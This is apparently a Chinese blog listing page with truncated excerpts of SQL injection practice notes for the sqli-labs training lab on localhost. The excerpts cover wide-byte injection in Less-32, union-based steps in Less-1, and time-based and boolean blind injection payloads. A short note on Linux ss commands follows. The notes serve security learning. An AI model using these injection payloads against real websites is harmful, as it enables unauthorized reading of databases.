- 博客(7)
- 资源 (1)
- 收藏
- 关注
原创 Less-32宽字节注入练习
逃逸http://127.0.0.1/sqli/Less-32/?id=1%df' order by 400 -- +注入条件: 要有宽字节注入漏洞 要满足目标程序使用双/多字节字符集进行解析其次不同字符集范围不一样,可能低位不包含单字节字符集的字符,这样就没办法了,所以要保证在该种字符集范围中包含低字节位,比如 0x5C(01011100) 的字符,即转义符\。原理:一个gbk汉字占两个字节,取值范围是(编码位数):第一个字节是(129-254),第二个字节(64-254)当设置gbk编.
2022-01-23 03:01:31 2429
原创 less-1:
1、通过 http://127.0.0.1/sqli/Less-1/?id=1' 报错 说明存在注入2、通过http://127.0.0.1/sqli/Less-1/?id=1' order by 10000 -- +判断闭合字符 为 ‘3.使用http://127.0.0.1/sqli/Less-1/?id=1' order by 10000 -- + 二分法来判断列数4.判断显示位5.通过命令http://127.0.0.1/sqli/Less-1/?id=1' and 1=2 unio
2022-01-23 03:00:38 239
原创 时间型盲注
1.求数据库名长度andif(length(database())=8,sleep(5),1)---2.求数据库名对应的ASCII值andif(ascii(substr((selectdatabase()),1,1))=115,sleep(5),1)---3.求表的数量andif((selectcount(*)frominformation_schema.tableswheretable_schema='security')=4,sleep(5),1)---...
2022-01-23 02:58:54 589
原创 布尔型盲注
1.求闭合字符2.求数据库名长度andlength(database())=8%233.求当前数据库名对应的ASCII值andascii(substr(database(),1,1))=115%234.求表的数量and(selectcount(table_name)frominformation_schema.tableswheretable_schema='security')=4%235.求表名的长度and(selectlength(tabl...
2022-01-23 02:57:37 83
原创 Linux命令
1 ssss -l显示本地打开的所有端口ss -t -a 显示所有的tcp Socektss -u -a 显示所有的UDP Socektss -s 列出当前已经链接 关闭 等待的tcp连接ss -I 列出当前监听端口ss -pI 列出每个进程名以及器监听的端口...
2022-01-13 21:48:51 978
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人